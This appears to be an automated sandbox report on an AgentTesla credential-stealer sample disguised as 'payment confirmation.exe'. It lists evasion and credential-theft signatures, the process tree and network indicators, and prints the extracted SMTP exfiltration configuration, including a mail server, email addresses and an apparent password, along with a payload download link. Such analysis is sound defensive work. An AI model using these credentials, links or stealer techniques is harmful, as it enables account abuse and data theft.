Loading ...

Play interactive tourEdit tour

Windows Analysis Report payment confirmation.exe

Overview

General Information

Sample Name:payment confirmation.exe
Analysis ID:1370
MD5:930debccdeecb4fc138b0319bef33720
SHA1:b56f93dc8316eb35a3b311ce1c412e5d617bcfeb
SHA256:03082b2f67073c9017a28fe1ef9166d38edd339ef72da583653f083ec2b9fac4
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: RegAsm connects to smtp port
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Executable has a suspicious name (potential lure to open the executable)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)

Classification

Process Tree

  • System is w10x64native
  • payment confirmation.exe (PID: 2824 cmdline: 'C:\Users\user\Desktop\payment confirmation.exe' MD5: 930DEBCCDEECB4FC138B0319BEF33720)
    • RegAsm.exe (PID: 4008 cmdline: 'C:\Users\user\Desktop\payment confirmation.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "pedidos@pizzascasadelfi.comWigeti04rera$mail.pizzascasadelfi.comdrantonjavier@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: RegAsm.exe PID: 4008JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: RegAsm.exe PID: 4008JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Overview

          Networking:

          barindex
          Sigma detected: RegAsm connects to smtp portShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 91.197.229.125, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 4008, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49796

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: payment confirmation.exe.2824.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "pedidos@pizzascasadelfi.comWigeti04rera$mail.pizzascasadelfi.comdrantonjavier@gmail.com"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: payment confirmation.exeVirustotal: Detection: 30%Perma Link
          Source: payment confirmation.exeReversingLabs: Detection: 15%
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CFCA018 CryptUnprotectData,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CFCA688 CryptUnprotectData,
          Source: payment confirmation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49794 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.74.193:443 -> 192.168.11.20:49795 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.74.193:443 -> 192.168.11.20:49795 version: TLS 1.2

          Networking:

          barindex
          Source: Joe Sandbox ViewASN Name: GYRONGB GYRONGB
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-NGqww34y3w8ohKj32E_9V1PymXSPn6n HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v2kr4nhgnks06n5389380k8fa8p4g3sj/1632756600000/00519186742208262786/*/1-NGqww34y3w8ohKj32E_9V1PymXSPn6n?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-50-docs.googleusercontent.comConnection: Keep-Alive
          Source: global trafficTCP traffic: 192.168.11.20:49796 -> 91.197.229.125:587
          Source: global trafficTCP traffic: 192.168.11.20:49796 -> 91.197.229.125:587
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: RegAsm.exe, 00000007.00000002.31009755976.000000001E1A0000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
          Source: RegAsm.exe, 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: RegAsm.exe, 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
          Source: RegAsm.exe, 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmpString found in binary or memory: http://cIypqx.com
          Source: RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
          Source: RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
          Source: RegAsm.exe, 00000007.00000003.26414612932.00000000012EE000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: RegAsm.exe, 00000007.00000003.26414612932.00000000012EE000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
          Source: RegAsm.exe, 00000007.00000002.31010284622.000000001E203000.00000004.00000001.sdmpString found in binary or memory: http://mail.pizzascasadelfi.com
          Source: RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
          Source: RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
          Source: RegAsm.exe, 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000003.27330557897.0000000001451000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.31010226667.000000001E1FB000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.31009755976.000000001E1A0000.00000004.00000001.sdmpString found in binary or memory: http://toAgW8Meo4yo1JT.org
          Source: RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: RegAsm.exe, 00000007.00000003.26414612932.00000000012EE000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
          Source: RegAsm.exe, 00000007.00000003.26414612932.00000000012EE000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-50-docs.googleusercontent.com/
          Source: RegAsm.exe, 00000007.00000002.30997838627.00000000012AE000.00000004.00000020.sdmpString found in binary or memory: https://doc-08-50-docs.googleusercontent.com/R&
          Source: RegAsm.exe, 00000007.00000002.30997838627.00000000012AE000.00000004.00000020.sdmpString found in binary or memory: https://doc-08-50-docs.googleusercontent.com/_&3
          Source: RegAsm.exe, 00000007.00000003.26414612932.00000000012EE000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v2kr4nhg
          Source: RegAsm.exe, 00000007.00000002.30997435878.0000000001268000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
          Source: RegAsm.exe, 00000007.00000002.30997435878.0000000001268000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/NS
          Source: RegAsm.exe, 00000007.00000003.26414612932.00000000012EE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-NGqww34y3w8ohKj32E_9V1PymXSPn6n
          Source: RegAsm.exe, 00000007.00000003.26414612932.00000000012EE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-NGqww34y3w8ohKj32E_9V1PymXSPn6n9
          Source: RegAsm.exe, 00000007.00000003.26414612932.00000000012EE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-NGqww34y3w8ohKj32E_9V1PymXSPn6nZdqgLB11lmUCfLcA0
          Source: RegAsm.exe, 00000007.00000002.30997337103.0000000001250000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-NGqww34y3w8ohKj32E_9V1PymXSPn6nwininet.dllMozilla/5
          Source: RegAsm.exe, 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: unknownDNS traffic detected: queries for: drive.google.com
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-NGqww34y3w8ohKj32E_9V1PymXSPn6n HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v2kr4nhgnks06n5389380k8fa8p4g3sj/1632756600000/00519186742208262786/*/1-NGqww34y3w8ohKj32E_9V1PymXSPn6n?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-50-docs.googleusercontent.comConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49794 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.74.193:443 -> 192.168.11.20:49795 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.74.193:443 -> 192.168.11.20:49795 version: TLS 1.2

          System Summary:

          barindex
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: payment confirmation.exe
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: payment confirmation.exeStatic file information: Suspicious name
          Source: payment confirmation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_010069B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_01000778
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_01044320
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_01043A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0104BA58
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0104C7B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_01043708
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0110C378
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CEEDC68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CEE97B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CEEE9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CEEF270
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CEE9230
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CEE44F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CEE3330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CFC5DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CFC71D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CFC2FD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CFC034C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CFCB310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CFC71C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CFCB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D530DA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D5349B5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D53678A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D5371A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D538D70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D530538
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D53A5A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1DFC5E08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1DFC4ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1DFC6AF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CEEAC30
          Source: payment confirmation.exe, 00000001.00000000.25950630578.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamedamrred.exe vs payment confirmation.exe
          Source: payment confirmation.exeBinary or memory string: OriginalFilenamedamrred.exe vs payment confirmation.exe
          Source: payment confirmation.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\payment confirmation.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dll
          Source: payment confirmation.exeVirustotal: Detection: 30%
          Source: payment confirmation.exeReversingLabs: Detection: 15%
          Source: payment confirmation.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\payment confirmation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\payment confirmation.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
          Source: unknownProcess created: C:\Users\user\Desktop\payment confirmation.exe 'C:\Users\user\Desktop\payment confirmation.exe'
          Source: C:\Users\user\Desktop\payment confirmation.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\payment confirmation.exe'
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\payment confirmation.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\payment confirmation.exe'
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\payment confirmation.exeFile created: C:\Users\user\AppData\Local\Temp\~DFE1C339D0F3D9FD34.TMPJump to behavior
          Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@4/1@4/3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:304:WilStaging_02
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\Desktop\payment confirmation.exeCode function: 1_2_00406252 push ebx; retf
          Source: C:\Users\user\Desktop\payment confirmation.exeCode function: 1_2_0040645E push edi; retf
          Source: C:\Users\user\Desktop\payment confirmation.exeCode function: 1_2_00404A04 push 0000003Ah; iretd
          Source: C:\Users\user\Desktop\payment confirmation.exeCode function: 1_2_0040523B push edi; ret
          Source: C:\Users\user\Desktop\payment confirmation.exeCode function: 1_2_004080D3 push cs; ret
          Source: C:\Users\user\Desktop\payment confirmation.exeCode function: 1_2_004060E8 push dword ptr [edi-36h]; iretd
          Source: C:\Users\user\Desktop\payment confirmation.exeCode function: 1_2_00408098 push cs; ret
          Source: C:\Users\user\Desktop\payment confirmation.exeCode function: 1_2_004047D9 push cs; retf
          Source: C:\Users\user\Desktop\payment confirmation.exeCode function: 1_2_00404795 push cs; retf
          Source: C:\Users\user\Desktop\payment confirmation.exeCode function: 1_2_02204EBA push ds; ret
          Source: C:\Users\user\Desktop\payment confirmation.exeCode function: 1_2_02201080 push 6AB0415Fh; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_010021E9 push ebx; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0104F3F5 pushfd ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CEE7E5D push edi; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CEE2177 push edi; retn 0000h
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1CFC5DF0 pushfd ; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D535AB9 push E9204922h; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D532470 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D5324F8 pushfd ; ret
          Source: C:\Users\user\Desktop\payment confirmation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\payment confirmation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\payment confirmation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\payment confirmation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\payment confirmation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
